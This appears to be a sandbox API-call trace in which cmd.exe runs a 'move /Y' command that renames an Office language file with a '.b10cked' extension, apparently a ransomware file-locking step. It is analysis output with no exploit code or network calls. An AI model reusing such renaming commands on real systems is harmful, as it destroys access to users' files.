[0201.668] GetCurrentThreadId () returned 0xe84 [0201.668] GetTickCount () returned 0x38f15 [0201.668] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb1c | out: lpPerformanceCount=0x1efb1c*=25845759541) returned 1 [0201.669] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0201.669] __set_app_type (_Type=0x1) [0201.669] __p__fmode () returned 0x76b331f4 [0201.669] __p__commode () returned 0x76b331fc [0201.669] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0201.670] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0201.670] GetCurrentThreadId () returned 0xe84 [0201.670] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe84) returned 0x38 [0201.670] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.670] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0201.670] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.713] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0201.713] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efab4 | out: phkResult=0x1efab4*=0x0) returned 0x2 [0201.713] VirtualQuery (in: lpAddress=0x1efaeb, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.713] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0201.713] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0201.713] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0201.714] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efa84, dwLength=0x1c | out: lpBuffer=0x1efa84*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0201.714] GetConsoleOutputCP () returned 0x1b5 [0201.716] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.716] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0201.716] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.717] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0201.718] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.718] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.720] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.720] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.724] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.724] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.725] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.725] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0201.732] GetEnvironmentStringsW () returned 0x3a0180* [0201.732] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0201.732] GetEnvironmentStringsW () returned 0x3a0180* [0201.732] FreeEnvironmentStringsW (penv=0x3a0180) returned 1 [0201.732] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea24 | out: phkResult=0x1eea24*=0x40) returned 0x0 [0201.732] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0xa8, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x1, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x1, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x0, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x40, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x40, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x40, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegCloseKey (hKey=0x40) returned 0x0 [0201.733] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eea24 | out: phkResult=0x1eea24*=0x40) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x40, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x1, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x1, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x0, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x9, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x4, lpData=0x1eea30*=0x9, lpcbData=0x1eea28*=0x4) returned 0x0 [0201.733] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eea2c, lpData=0x1eea30, lpcbData=0x1eea28*=0x1000 | out: lpType=0x1eea2c*=0x0, lpData=0x1eea30*=0x9, lpcbData=0x1eea28*=0x1000) returned 0x2 [0201.734] RegCloseKey (hKey=0x40) returned 0x0 [0201.734] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.734] srand (_Seed=0x5b8863a3) [0201.734] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"" [0201.734] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked\"" [0201.734] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.734] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.734] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.734] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.735] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.735] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.735] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.735] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.735] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.735] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.735] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.735] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.735] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.735] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.735] GetEnvironmentStringsW () returned 0x3a22d0* [0201.735] FreeEnvironmentStringsW (penv=0x3a22d0) returned 1 [0201.735] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.735] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.735] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.735] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.735] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.735] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.735] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.735] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.735] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.735] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.735] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef7f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.736] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef7f0, lpFilePart=0x1ef7ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef7ec*="Desktop") returned 0x18 [0201.736] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.736] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef56c | out: lpFindFileData=0x1ef56c) returned 0x3a0010 [0201.736] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0201.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef56c | out: lpFindFileData=0x1ef56c) returned 0x3a0010 [0201.736] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0201.736] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef56c | out: lpFindFileData=0x1ef56c) returned 0x3a0010 [0201.736] FindClose (in: hFindFile=0x3a0010 | out: hFindFile=0x3a0010) returned 1 [0201.736] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.736] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.737] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.737] GetEnvironmentStringsW () returned 0x3a2af0* [0201.737] FreeEnvironmentStringsW (penv=0x3a2af0) returned 1 [0201.737] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.737] GetConsoleOutputCP () returned 0x1b5 [0201.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.756] GetUserDefaultLCID () returned 0x409 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef930, cchData=128 | out: lpLCData="0") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef930, cchData=128 | out: lpLCData="0") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef930, cchData=128 | out: lpLCData="1") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0201.759] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.759] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.760] GetConsoleTitleW (in: lpConsoleTitle=0x3908e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.770] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.770] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.770] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.771] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.771] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.771] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.771] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.771] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.771] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.771] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.771] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.774] GetConsoleTitleW (in: lpConsoleTitle=0x1ef628, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.798] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.798] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.798] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.798] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.798] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.798] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.798] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.798] _wcsicmp (_String1="move", _String2="SET") returned -6 [0201.798] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.798] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.798] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.798] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.798] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.798] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.798] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.798] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.798] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.798] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.798] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.798] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.798] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.798] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.798] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.798] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.798] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.798] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.798] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.798] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.798] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.798] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.798] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.800] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.800] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.800] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef3e4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef3dc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef3dc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.800] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.801] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.801] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.801] _wcsicmp (_String1="MSSETL~1.HXN", _String2=".") returned 63 [0201.801] _wcsicmp (_String1="MSSETL~1.HXN", _String2="..") returned 63 [0201.801] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mssetl~1.hxn")) returned 0x2022 [0201.802] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3a1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.802] SetErrorMode (uMode=0x0) returned 0x0 [0201.802] SetErrorMode (uMode=0x1) returned 0x0 [0201.802] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", nBufferLength=0x104, lpBuffer=0x1eed6c, lpFilePart=0x1eed54 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", lpFilePart=0x1eed54*="MSSETL~1.HXN") returned 0x27 [0201.802] SetErrorMode (uMode=0x0) returned 0x1 [0201.802] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.802] _wcsicmp (_String1="MSSETL~1.HXN", _String2=".") returned 63 [0201.802] _wcsicmp (_String1="MSSETL~1.HXN", _String2="..") returned 63 [0201.802] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mssetl~1.hxn")) returned 0x2022 [0201.802] SetErrorMode (uMode=0x0) returned 0x0 [0201.802] SetErrorMode (uMode=0x1) returned 0x0 [0201.802] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", nBufferLength=0x104, lpBuffer=0x1ef1e8, lpFilePart=0x1eef80 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", lpFilePart=0x1eef80*="MSSETL~1.HXN") returned 0x27 [0201.802] SetErrorMode (uMode=0x0) returned 0x1 [0201.802] SetErrorMode (uMode=0x0) returned 0x0 [0201.802] SetErrorMode (uMode=0x1) returned 0x0 [0201.802] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1ef3f0, lpFilePart=0x1eef80 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked", lpFilePart=0x1eef80*="MS.SETLANG.14.1033.hxn.b10cked") returned 0x39 [0201.802] SetErrorMode (uMode=0x0) returned 0x1 [0201.802] SetLastError (dwErrCode=0x0) [0201.802] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.SETLANG.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.setlang.14.1033.hxn.b10cked")) returned 0xffffffff [0201.803] GetLastError () returned 0x2 [0201.803] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ee8fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee8fc) returned 0x390e70 [0201.803] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x1ee8fc | out: lpFindFileData=0x1ee8fc) returned 0 [0201.803] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0201.804] GetLastError () returned 0x12 [0201.804] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ee8fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee8fc) returned 0x390e70 [0201.804] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x1ee8fc | out: lpFindFileData=0x1ee8fc) returned 0 [0201.804] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0201.804] GetLastError () returned 0x12 [0201.805] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSSETL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3a1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3a1be0) returned 0x390e70 [0201.805] FindNextFileW (in: hFindFile=0x390e70, lpFindFileData=0x3a1be0 | out: lpFindFileData=0x3a1be0) returned 0 [0201.805] FindClose (in: hFindFile=0x390e70 | out: hFindFile=0x390e70) returned 1 [0201.805] GetLastError () returned 0x12 